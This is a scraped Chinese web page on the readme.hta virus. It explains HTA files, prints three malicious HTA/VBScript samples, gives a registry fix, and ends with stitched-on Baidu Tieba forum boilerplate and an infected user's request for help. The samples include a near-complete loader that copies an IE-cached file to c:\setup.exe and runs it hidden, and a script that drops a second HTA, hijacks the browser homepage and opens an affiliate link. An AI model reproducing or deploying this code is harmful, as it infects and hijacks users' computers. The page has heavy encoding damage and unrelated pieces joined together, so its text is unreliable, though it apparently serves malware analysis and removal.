readme.hta病毒怎么杀是什么病毒

来源:蜘蛛抓取(WebSpider) 时间:2016-10-08 05:23 标签: 电脑中毒 readme.hta
摘要:一 HTA是什么 HTA 是HTML应用程序(HTML Application)的缩写,可以使用html中的绝大多数标签、脚本等。直接将HTML保存成HTA的格式,就是一个能够独立运行的应用软件。 与普通HTML网页相比,它多了个HTA:APPLICATION标签,其实就是这个标签提供了一系列面向...
一 HTA是什么
&& & HTA是HTML应用程序(HTML Application)的缩写,可以使用html中的绝大多数标签、脚本等。直接将HTML保存成HTA的格式,就是一个能够独立运行的应用软件。
与普通HTML网页相比,它多了个&HTA:APPLICATION&标签,其实就是这个标签提供了一系列面向应用程序的功能。最重要的是:它能够让你访问客户的机器,而不用担心的限制。
&& 运行后缀名为hta的文件,此时会调用%SystemRoot%\system32\mshta.exe(HTML Application host)执行
二 邂逅HTA病毒
&& 1 初见HTA的骷髅头
&& & & 2009年的时候那时候貌似流行一个名为暴风一号的恶意脚本病毒,里面就包含了一段HTA恶意代码,它的目的是显示一个红色的骷髅头
&HTML&&HEAD&&TITLE&暴风一号&/TITLE&&HTA:APPLICATION&APPLICATIONNAME=&BoyFine&V1.0&&SCROLL=&no&&tate=&maximize&&border=&none&SINGLEINSTANCE=&yes&&CAPTION=&no&&contextMenu=&no&&ShowInTaskBar=&no&&selection=&no&&&!--&一个光秃秃的大窗体:无边框,没有标题,不允许使用右键,不在任务栏显示..&--&&/HEAD&&BODY&bgcolor=#000000&&DIV&align&=&center&&&!--&使用Wingdings字体,内容N(相当于一个骷髅头)颜色红色&--&&font&style=&font-size:3500%;font-family:Wcolor=red&&N&/font&&BR&&font&style=&font-size:200%;font-family:黑体;color=red&&暴风一号&/font&&/DIV&&/BODY&&/HTML&&&
&2 二见HTA,临时文件夹中缓存文件的奥秘 大概2010年5月份的时候有个AV界人士给了偶一个恶意HTA文件找找病毒是什么运行的,这个名为★直接点击运行,播放色情电影★.hta的文件让偶第一次见到了神奇的病毒加载方式:让IE自动缓存相应的病毒文件,然后让用户执行HTA自动查找病毒文件并执行.
&script&language=vbs&window.moveto&2100,2050window.resizeto&0,0set&amshell=createobject(&wscript.shell&)downpath=amshell.expandenvironmentstrings(&%Userprofile%&)&&\local&settings&'&downpath&IE缓存文件夹showallfile(downpath)sub&showallfile(path)findfilename=&load_css[1].css&'&load_css[1].css被ie自动缓存的临时文件,因为ie认为这个可能是层叠样式表set&fso&=&createobject(&scripting.filesystemobject&)set&f&=&fso.getfolder(path)set&fc&=&f.subfoldersfor&each&f1&in&fc'查杀load_css[1].css然后将它重名为setup.exe并执行if&fso.fileexists(path&&\&&f1.name&&\&&findfilename)&then&&&&if&fso.fileexists(&c:\setup.exe&)&then&&&&fso.getfile(&c:\setup.exe&).attributes&=&0&&&&fso.DeleteFile&&c:\setup.exe&&&&&end&if&&&&if&fso.fileexists(path&&\&&f1.name&&\&&findfilename)&then&&&&fso.copyfile&path&&\&&f1.name&&\&&findfilename,&&c:\setup.exe&&&&&fso.getfile(path&&\&&f1.name&&\&&findfilename).attributes&=&0&&&&fso.DeleteFile&path&&\&&f1.name&&\&&findfilename&&&&end&if&&&&if&fso.fileexists(&c:\setup.exe&)&then&&&&&&&&fso.getfile(&c:\setup.exe&).attributes&=&7&&&&&&&&amshell.run&&c:\setup.exe&,0&&&&end&ifend&ifshowallfile&path&&\&&f1.namenextset&fso&=&nothingend&subwindow.close&/script&
3 三见HTA,与时俱进盯上你的IE主页 貌似也是最近几个星期吧,现在可以在不少的xx网站看到要求用户下载一个HTA文件(描述的内容和之前类似),相对于之前的是木马加载器,这次常见的是直接实现现在最火热的恶意功能:篡改主页,添加推广链接等
&script&language=VBScript.Encode&on&error&resume&nextwindow.moveTo&4000,4000window.resizeTo&0,0&strbuf1=&...&Function&WriteBinary(FileName,&ByteArray)&&&&on&error&resume&next&&&&Dim&FS:&Set&FS&=&CreateObject(&Scripting.FileSystemObject&)&&&&Dim&TextStream&&&&Set&TextStream&=&FS.CreateTextFile(FileName,true,true)&&&&TextStream.Write&&ByteArrayEnd&Function....Function&sAttach&(sMyName)&&&&Dim&fso&&&&Set&fso&=&CreateObject(&scripting.filesystemobject&)&&&&Set&myfile=fso.CreateTextFile(&sMyName&,,true)&&&&&&&&myfile.WriteLine&&本音频解码格式与您的计算机硬件不兼容或解码库已过期!&&&&&myfile.Closeend&Function...Function&RunProgram(strPath)&&&&Set&objShell&=&CreateObject(&Shell.Application&)&&&&&objShell.ShellExecute&strPath,&,&,&,&1End&Functioncreate&&D:\RECYCLERHTM\&strbuf1=replace(strbuf1,&yunzhen&,&&&)strbuf1=replace(strbuf1,&yundao&,&&&)strbuf1=replace(strbuf1,&iamkongge&,vbcrlf)strbuf1=replace(strbuf1,&kuangcaonm&,&&&&)&!--&释放并运行1c43e711e55e053ad102be.hta&,修改主页为www.oxju.net,然后添加一堆推广链接--&WriteBinary&&D:\RECYCLERHTM\1c43e711e55e053ad102be.hta&,strbuf1RunProgram&&D:\RECYCLERHTM\1c43e711e55e053ad102be.hta&&!--&通过IEXPLORE.EXE打开淘宝推广页面赚取广告点击&--&CreateObject(&WScript.Shell&).Exec(&C:\Program&Files\Internet&Explorer\IEXPLORE.EXE&http://pindao./tms/channel/onsale.htm?pid=mm_&eventid=&unid=6&)ListFolder1&createobject(&Scripting.FileSystemObject&).GetFolder(&.&).Path&&window.close&&/script&
4 对于解决方案呢,貌似偶注册表中hta文件关联直接删除了,貌似什么mshta.exe也可以干掉
HKEY_CLASSES_ROOT\.hta
标签分类:求助啊,手贱下载了一个.hta后中毒了_病毒吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名:今日本吧第个签到,本吧因你更精彩,明天继续来努力!
本吧签到人数:0成为超级会员,使用一键签到本月漏签0次!成为超级会员,赠送8张补签卡连续签到:天&&累计签到:天超级会员单次开通12个月以上,赠送连续签到卡3张
关注:60,357贴子:
求助啊,手贱下载了一个.hta后中毒了收藏
电脑装了eset,不过一点防护作用都没,中毒后,经常弹出猥琐网站,搜索了帖子,在注册表删除了.hta和run下面的网页地址,但情况依旧。现在在安全模式下用eset查毒中,之前刚中毒扫描system32查了2个。没用。救命
创维OLED-S9D
顶死自己继续等
有样本吗?
登录百度帐号推荐应用
为兴趣而生,贴吧更懂你。或

我要回帖

更多关于 电脑中毒 readme.hta 的文章

 

随机推荐